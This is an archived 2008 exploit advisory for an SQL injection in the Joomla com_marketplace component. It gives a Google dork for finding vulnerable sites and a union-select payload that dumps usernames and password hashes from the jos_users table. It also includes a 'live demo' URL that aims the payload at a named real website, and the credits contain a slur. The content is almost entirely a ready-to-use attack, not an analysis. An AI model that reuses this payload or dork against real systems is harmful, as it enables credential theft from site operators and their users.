joomlamarketplace-sql.txt

2008-11-12T00:00:00
ID PACKETSTORM:71886
Type packetstorm
Reporter TR-ShaRk
Modified 2008-11-12T00:00:00

Description

                                        
                                            `###########################################################  
Joomla com_marketplace(catid) SQL-injection vulnerability  
###########################################################  
  
###################################################  
#[~] Author : TR-ShaRk  
#[~] Msn : Starhack@tr-shark.org  
#[~] Im Not Hacker  
#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER  
#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri  
  
#[!] Module_Name: com_marketplace  
#[!] Script_Name: Joomla  
#[!] Google_Dork: inurl:"com_marketplace"  
#[!] Script Download: http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip  
##################################################  
  
  
#[~] Example:  
http://localhost/Path/index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]  
  
#[~] Exploit:  
9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--  
  
  
#[~] LiveDemo:  
http://www.mmopa.com/index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--  
  
  
###############################  
Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik  
###############################  
  
  
`